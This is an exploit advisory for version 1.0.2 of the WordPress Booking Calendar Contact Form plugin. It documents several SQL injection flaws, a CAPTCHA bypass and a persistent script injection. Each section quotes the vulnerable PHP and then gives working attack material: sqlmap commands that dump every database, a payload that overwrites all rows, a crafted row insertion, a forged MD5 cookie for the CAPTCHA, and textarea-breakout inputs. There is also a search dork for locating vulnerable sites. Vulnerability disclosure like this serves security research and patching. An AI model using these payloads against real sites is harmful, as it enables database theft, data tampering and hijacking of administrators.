WordPress Plugin Booking Calendar Contact Form 1.0.2 - Multiple Vulnerabilities

# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple
vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of
/wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link:
http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.

============================================
* Authenticated SQL injection
============================================

========================
Description
========================


In a site that has installed the plugin vulnerable and an attacker who has
an account
editor privileges can exploit the flaw SQL injection and possibly escalate
their privileges.

========================
Vulnerability
========================
vulnerable function code is located in dex_bcf.php


function dex_bccf_load_season_prices() {
    global $wpdb;

    if ( ! current_user_can('edit_pages') )
    {
        echo 'No enough privilegies to load this content.';
        exit;
    }

    if (!defined('CP_BCCF_CALENDAR_ID'))
        define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);

    //.....vulnerable line

    $codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.CP_BCCF_CALENDAR_ID);
    $maxcosts = 0;

...

    if (count ($codes))
    {
        ... //Print results [bueno para seleccion mediante UNION]

        foreach ($codes as $value)
        {
           echo '<tr>';
           $price = explode(';',$value->price);
           echo '<td>'.$price[0].'</td>';
           for ($k=1; $k<=$maxcosts; $k++)
               echo '<td>'.@$price[$k].'</td>';
           echo '<td>'.substr($value->date_from,0,10).'</td>';
           echo '<td>'.substr($value->date_to,0,10).'</td>';
           echo '<td>[<a
href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>';
           echo '</tr>';
        }

...
    }

======================
Injection
======================
the following urls can be used to inject code.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1

------------------------
GET parameter vulnerable
------------------------
dex_item

========================
injection techniques:
========================

-> UNION BASED
-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
"
-p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE"
--dbms="mysql" --dbs

====================================================


=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_delete($ret) {
    global $wpdb;
    $wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
    return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete

------------------------
POST parameter vulnerable
------------------------
id

========================
injection techniques:
========================

-> TIME BASED BLIND

=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------

python sqlmap.py --url="
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
"
--data="id=1" -p id --level=5 --risk=3
--cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T



====================================================
* Authenticated SQL injection
====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_update($ret) {
    global $wpdb;

    dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
    dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");

    $wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
    return $ret;
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit

------------------------
POST parameter vulnerable
------------------------
id

========================
injection techniques:
========================

-> BLIND

=======================
POC
=======================
(modifing all rows with "i0akiN" value and sleeping 5 seconds)

url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN


=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================

===============
Vulnerable code
================

function dex_bccf_calendar_add($ret) {
    global $wpdb;

    $calid = str_replace  (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
    ...

    $wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
                "
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
    .esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
    ..

}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]

========================
injection techniques:
========================

-> Insertion data

=======================
POC
=======================

Insert a row into wp_bccf_reservation_calendars_data table without use
other post parameters

http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&
id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -




====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================

An attacker without autorization can send modified requests to database and
sensitive information
that can use for escalate privilegies and more...

======================
Vulnerability
======================
vulnerable function code is located in dex_bcf.php


function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...

//$calendar is not sanitized in sql query

$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
    $mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
    while (
           (($enddate>$startday) && !$mode) ||
           (($enddate>=$startday) && $mode)
           )
    {
        $daily_price = $default_price;
        $sprice = array();
        foreach ($codes as $value)
        {
           $sfrom = strtotime($value->date_from);
           $sto = strtotime($value->date_to);
           if ($startday >= $sfrom && $startday <= $sto)
           {
               $sprice = explode (';', $value->price);
               $daily_price = $sprice[0];
           }
        }
        $season_prices[] = $sprice;
        $price += $daily_price;
        $startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
        $days++;
    }

...
}

======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost

------------------------
post variable vulnerable
------------------------
dex_item=1

========================
injection techniques:
========================

-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND

========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.

python sqlmap.py --url="
http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost
"
--data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs
--tecnique U

===========================================================

============================================================
* Unauthenticated SQL injection 2
============================================================

========================
Description
========================

The following function is also vulnerable to SQL injection because usually
the variable
CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET
['dex_item'] Besides this function is used in several places
the code.

========================
Vulnerability
========================
Vulnerable function:

function dex_bccf_get_option ($field, $default_value)
{
    global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
    if (!defined("CP_BCCF_CALENDAR_ID"))
        return  $default_value;
    if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
        $value = @$dex_option_buffered_item->$field;
    else
    {
//....vulnerable line

       $myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
       $value = @$myrows[0]->$field;
       $dex_option_buffered_item = $myrows[0];
       $dex_option_buffered_id  = CP_BCCF_CALENDAR_ID;
    }
    if ($value == '' && $dex_option_buffered_item->calendar_language == '')
        $value = $default_value;
    return $value;
}




##########################################

======================================
    *  CAPTCHA BYPASS & ROW INSERTION
======================================

==============
DESCRIPTION
==============

An attacker can manipulate some variables for bypass conditional staments.
For example: insert unlimited rows into
table (could use a program)

=============
 ... HOW?
=============

An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5
encryption saving into value of
"rand_code" cookie.

==========
POC
==========

REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&
dex_item=1&
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&
hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
                                                                ^
--------------                                                  |
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1

-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821  <---joaquin MD5 encrypted

===========================
VULNERABLE FUNCTION CODE
==========================


function dex_bccf_check_posted_data(){
  ....

if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
    if (
           (dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
           ( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
             ($_SESSION['rand_code'] == '')
           )
           &&
           ( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
             ($_COOKIE['rand_code'] == '')
           )
       )
    {
        $_SESSION['rand_code'] = '';
        echo 'captchafailed';
        exit;
    }

// if this isn't the real post (it was the captcha verification) then echo
ok and exit
    if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
    echo 'ok';
        exit;
}
   ...

}


###########################################

=======================================
   *  Persistent JS/HTML code injection
=======================================

========================
Description:
========================
Un atacante sin autenticacion puede inyectar codigo malicioso que podria
ejecutar el navegador
de la victima(could be an administrator). Cuando la victima visite la
pagina modificada, el atacante
podria robar datos y/o controlar las acciones de la victima de forma remota.

========================
Vulnerability
========================

http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data

POST-DATA

dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
 %3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
 %3Ctextarea%3E


Parameters email_confirmation_to_user,email_notification_to_admin not
filtered and is included in admin page

====================
VULNERABLE FUNCTION
====================

dex_bccf_save_options() located in dex_bccf.php

save unfiltered post data



#########################################